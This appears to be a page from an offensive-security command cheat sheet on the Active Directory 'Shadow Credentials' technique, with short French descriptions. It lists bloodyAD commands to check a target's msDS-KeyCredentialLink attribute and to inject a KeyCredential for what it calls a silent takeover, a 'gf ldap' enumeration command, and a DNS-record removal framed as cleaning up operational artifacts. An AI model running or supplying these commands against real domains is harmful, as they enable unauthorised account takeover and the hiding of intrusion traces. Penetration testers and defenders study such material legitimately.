0xbbuddha0xbbuddha

ESC

Shadow Credentials

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$TARGET' --attr msDS-KeyCredentialLink

Description: Vérifier la présence de shadow credentials.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add shadowCredentials '$TARGET'

Description: Injecter un KeyCredential pour takeover silencieux.

Copy command
gf ldap -t $TARGET -u $USER -p $PASS --shadow-creds

Description: Enum rapide des objets concernés.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS remove dnsRecord '$RECORD' '<ip>'

Description: Exemple de cleanup d'artefact opérationnel.